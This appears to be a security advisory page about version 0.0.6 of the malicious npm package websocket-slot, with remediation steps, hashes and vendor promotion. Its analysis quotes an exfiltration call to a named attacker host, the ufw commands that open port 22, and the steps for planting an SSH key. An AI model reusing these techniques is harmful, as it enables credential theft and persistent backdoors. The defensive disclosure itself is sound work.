Which versions of websocket-slot are malicious?

The following npm versions of websocket-slot are flagged malicious: 0.0.6. Treat any of these as compromised.

How do I remediate websocket-slot if I installed it?

Remove websocket-slot from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is websocket-slot part of a known attack campaign?

Yes — websocket-slot is associated with the IN-MAL-2026-005292, IN-MAL-2026-005293 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect websocket-slot in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking websocket-slot and packages like it before any post-install script runs.

Malicious package

websocket-slotnpm

Malicious code in websocket-slot (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5530

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall websocket-slot

What this malware does

On npm install, this package runs node test.js via scripts.postinstall, which executes the logic in index.js. The postinstall behavior performs three distinct installer-side attacks: (1) it recursively walks the installer's home directory (and on Windows, non-C: drives plus C:\Users), matching files against a remotely-fetched pattern list, then POSTs each matched file plus username/platform metadata to http://cloudflare-prevention.vercel.app/api/v1 via FormData (batchUpload(found, "http://cloudflare-prevention.vercel.app/api/v1", success)); (2) on Linux, addSshKeyToUser fetches an attacker-supplied SSH public key from http://cloudflare-prevention.vercel.app/api/ssh-key and appends it to ~/.ssh/authorized_keys with mode 0600, then runs sudo ufw enable and sudo ufw allow 22/tcp to ensure inbound SSH is reachable — giving the operator persistent remote root-equivalent access to the host; (3) from_str_1 recursively scans process.cwd() for id.json (Solana wallet keypair), config.toml/Config.toml, env, and .env, uploading each match to a sibling endpoint. Scan patterns, block patterns, and the SSH key are all fetched over plain HTTP from cloudflare-prevention.vercel.app — a Vercel-hosted lookalike of a Cloudflare-branded service — meaning the operator can mutate which files are exfiltrated and which key is granted SSH access at any time.

Malicious versions

1 flagged

0.0.6

Indicators of compromise (SHA-256)

c15c40b8371646f167ffa7d5a2ba2c8d0fd454ef7054eeb41807a1a3eda8e7a6

dff2c6c0da62db10517f42af8f1e926122d31e7500e7bccbe2f41fb1fe905eb0

Frequently asked questions

No. websocket-slot on npm has been identified as a malicious package (version 0.0.6 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005292IN-MAL-2026-005293

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection